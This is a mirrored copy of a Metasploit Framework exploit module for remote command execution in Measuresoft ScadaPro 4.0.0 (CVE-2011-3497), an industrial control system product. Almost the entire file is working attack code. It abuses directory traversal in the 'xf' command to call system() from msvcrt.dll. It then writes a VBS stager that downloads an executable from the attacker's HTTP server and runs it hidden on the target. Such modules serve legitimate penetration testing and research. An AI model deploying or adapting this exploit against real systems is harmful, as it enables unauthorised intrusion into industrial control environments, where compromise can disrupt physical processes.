CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/scada/scadapro_cmdexe.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8


9
  include Msf::Exploit::Remote::HttpServer::HTML

10
  include Msf::Exploit::Remote::Tcp

11
  include Msf::Exploit::EXE

12


13
  def initialize(info = {})

14
    super(update_info(info,

15
      'Name'           => 'Measuresoft ScadaPro Remote Command Execution',

16
      'Description'    => %q{

17
        This module allows remote attackers to execute arbitrary commands on the

18
        affected system by abusing via Directory Traversal attack when using the

19
        'xf' command (execute function). An attacker can execute system() from

20
        msvcrt.dll to upload a backdoor and gain remote code execution. This

21
        vulnerability affects version 4.0.0 and earlier.

22
      },

23
      'License'        => MSF_LICENSE,

24
      'Author'         =>

25
        [

26
          'Luigi Auriemma',                           # Initial discovery/poc

27
          'mr_me <steventhomasseeley[at]gmail.com>',  # msf

28
          'TecR0c <tecr0c[at]tecninja.net>',          # msf

29
        ],

30
      'References'     =>

31
        [

32
          [ 'CVE', '2011-3497'],

33
          [ 'OSVDB', '75490'],

34
          [ 'BID', '49613'],

35
          [ 'URL', 'http://aluigi.altervista.org/adv/scadapro_1-adv.txt'],

36
          [ 'URL', 'http://us-cert.gov/control_systems/pdf/ICS-ALERT-11-256-04.pdf'],

37
          # seemed pretty accurate to us ;)

38
          [ 'URL', 'http://www.measuresoft.net/news/post/Inaccurate-Reports-of-Measuresoft-ScadaPro-400-Vulnerability.aspx'],

39
        ],

40
      'DefaultOptions' =>

41
        {

42
          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',

43
        },

44
      'Platform'       => 'win',

45
      'Targets'        =>

46
        [

47
          # truly universal

48
          [ 'Automatic', { } ],

49
        ],

50
      'DefaultTarget'  => 0,

51
      'DisclosureDate' => '2011-09-16'))

52


53
      register_options(

54
      [

55
        Opt::RPORT(11234),

56
        OptString.new('URIPATH', [ true, "The URI to use.", "/" ]),

57
      ])

58
  end

59


60
  # couldn't generate a vbs or exe payload and then use the wF command

61
  # as there is a limit to the amount of data to write to disk.

62
  # so we just write out a vbs script like the old days.

63


64
  def build_vbs(url, stager_name)

65
    name_xmlhttp = rand_text_alpha(2)

66
    name_adodb   = rand_text_alpha(2)

67


68
    tmp = "#{@temp_folder}/#{stager_name}"

69


70
    vbs  = "echo Set #{name_xmlhttp} = CreateObject(\"Microsoft.XMLHTTP\") "

71
    vbs << ": #{name_xmlhttp}.open \"GET\",\"http://#{url}\",False : #{name_xmlhttp}.send"

72
    vbs << ": Set #{name_adodb} = CreateObject(\"ADODB.Stream\") "

73
    vbs << ": #{name_adodb}.Open : #{name_adodb}.Type=1 "

74
    vbs << ": #{name_adodb}.Write #{name_xmlhttp}.responseBody "

75
    vbs << ": #{name_adodb}.SaveToFile \"#{@temp_folder}/#{@payload_name}.exe\",2 "

76
    vbs << ": CreateObject(\"WScript.Shell\").Run \"#{@temp_folder}/#{@payload_name}.exe\",0 >> #{tmp}"

77


78
    return vbs

79
  end

80


81
  def on_request_uri(cli, request)

82
    if request.uri =~ /\.exe/

83
      print_status("Sending 2nd stage payload")

84
      return if ((p=regenerate_payload(cli)) == nil)

85
      data = generate_payload_exe( {:code=>p.encoded} )

86
      send_response(cli, data, {'Content-Type' => 'application/octet-stream'} )

87
      return

88
    end

89
  end

90


91
  def exploit

92
    # In order to save binary data to the file system the payload is written to a .vbs

93
    # file and execute it from there.

94
    @payload_name = rand_text_alpha(4)

95
    @temp_folder  = "C:/Windows/Temp"

96


97
    if datastore['SRVHOST'] == '0.0.0.0'

98
      lhost = Rex::Socket.source_address('50.50.50.50')

99
    else

100
      lhost = datastore['SRVHOST']

101
    end

102


103
    payload_src  = lhost

104
    payload_src << ":#{datastore['SRVPORT']}#{datastore['URIPATH']}#{@payload_name}.exe"

105


106
    stager_name = rand_text_alpha(6) + ".vbs"

107
    stager      = build_vbs(payload_src, stager_name)

108


109
    path = "..\\..\\..\\..\\..\\windows\\system32"

110


111
    createvbs = "xf%#{path}\\msvcrt.dll,system,cmd /c #{stager}\r\n"

112
    download_execute = "xf%#{path}\\msvcrt.dll,system,start #{@temp_folder}/#{stager_name}\r\n"

113


114
    print_status("Sending 1st stage payload...")

115


116
    connect

117
    sock.get_once()

118
    sock.put(createvbs)

119
    sock.get_once()

120
    sock.put(download_execute)

121
    handler()

122
    disconnect

123


124
    super

125
  end

126
end

127


128